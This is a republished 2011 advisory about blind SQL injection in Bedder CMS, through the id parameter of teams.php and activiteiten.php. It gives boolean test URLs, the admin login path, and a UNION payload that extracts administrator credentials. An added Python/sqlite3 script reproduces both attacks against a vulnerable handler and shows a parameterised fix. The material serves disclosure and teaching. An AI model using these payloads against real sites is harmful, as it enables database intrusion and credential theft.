Bedder CMS blind SQL injection vulnerability and fix - vulnerability alert - 黑吧安全网 (myhack58)

2011-05-24T00:00:00
ID MYHACK58:62201130588
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-05-24T00:00:00

Description

Original author: Xecuti0n3r

Vulnerability type: SQL injection

Vulnerability description:

The `id` parameter of teams.php and activiteiten.php is used in a database query without validation, so a crafted value changes the query's logic. The True/False request pairs below confirm boolean-based blind injection; the UNION payload at the end turns it into direct data extraction.

Proof of concept:

Injection 1:

[+]True : http://www.myhack58.com/teams.php?id=1 and 1=1--

[+]False: http://www.myhack58.com/teams.php?id=1 and 1=2--

[+]eViL : http://www.myhack58.com/teams.php?id=[SQLi ]

Injection 2:

[+]True : http://www.myhack58.com/activiteiten.php?id=91 and 1=1--

[+]False: http://www.myhack58.com/activiteiten.php?id=91 and 1=2--

[+]eViL : http://www.myhack58.com/activiteiten.php?id=[SQLi ]

Admin (backend) login page:

[+]The Cms Login Page is at : http://www.myhack58.com/cms/index.php

Injection payload to retrieve the administrator username and password:

[+]eViL : teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie

Note: the `1,2` placeholders must match the number of columns in the original query, and `0x3a` is the MySQL hex literal for ':' used to separate username and password in the returned column.
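The following is an added, self-contained Python/sqlite3 reproduction of both the boolean True/False test and the UNION extraction shown above; it is not code from Bedder CMS or from the advisory's author. It assumes a minimal `teams` table behind `teams.php?id=` and an `autorisatie` table whose column names are taken from the page's UNION payload; the row contents are constructed, and MySQL's `concat(a,0x3a,b)` is replaced by sqlite's `a||':'||b`. A parameterised handler is shown beside the vulnerable one so the difference in behaviour under the same requests is visible.

```python
import sqlite3

# Constructed sample schema: a 3-column `teams` table (so the page's `1,2,concat(...)`
# payload has the right column count) and the credential table named in the payload.
# Table/column names come from the advisory; the sample rows are made up for this example.
SCHEMA = """
CREATE TABLE teams (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
INSERT INTO teams VALUES (1, 'Team A', 'first team');
INSERT INTO teams VALUES (2, 'Team B', 'second team');
CREATE TABLE autorisatie (autorisatie_gebruikersnaam TEXT, autorisatie_wachtwoord TEXT);
INSERT INTO autorisatie VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def teams_vulnerable(conn, id_param: str):
    """Vulnerable pattern implied by the advisory: `id` is pasted straight into the SQL text."""
    sql = "SELECT id, name, description FROM teams WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def teams_fixed(conn, id_param: str):
    """Hardened handler (hypothetical fix): type-check the value and bind it as a parameter."""
    try:
        team_id = int(id_param)
    except ValueError:
        return []  # reject anything that is not a plain integer id
    return conn.execute(
        "SELECT id, name, description FROM teams WHERE id=?", (team_id,)
    ).fetchall()


def boolean_test(handler, conn):
    """The advisory's True/False pair: the two requests differ only in `1=1` vs `1=2`.
    Returns True when the responses differ, i.e. the parameter is injectable."""
    true_rows = handler(conn, "1 and 1=1--")
    false_rows = handler(conn, "1 and 1=2--")
    return true_rows != false_rows


def union_dump(handler, conn):
    """sqlite equivalent of the page's `-1 union select 1,2,concat(user,0x3a,pass) from autorisatie`.
    Returns the extracted `user:pass` strings from the third column."""
    payload = (
        "-1 union select 1,2,autorisatie_gebruikersnaam||':'||autorisatie_wachtwoord "
        "from autorisatie--"
    )
    return [row[2] for row in handler(conn, payload)]


if __name__ == "__main__":
    for name, handler in (("vulnerable", teams_vulnerable), ("fixed", teams_fixed)):
        print(name, "injectable:", boolean_test(handler, open_db()))
        print(name, "union dump:", union_dump(handler, open_db()))
```

Against the vulnerable handler the boolean test returns True and the UNION payload yields `admin:5f4dcc3b5aa765d61d8327deb882cf99`; against the parameterised handler both payloads are rejected before reaching the database, so the True/False responses are identical and nothing is extracted.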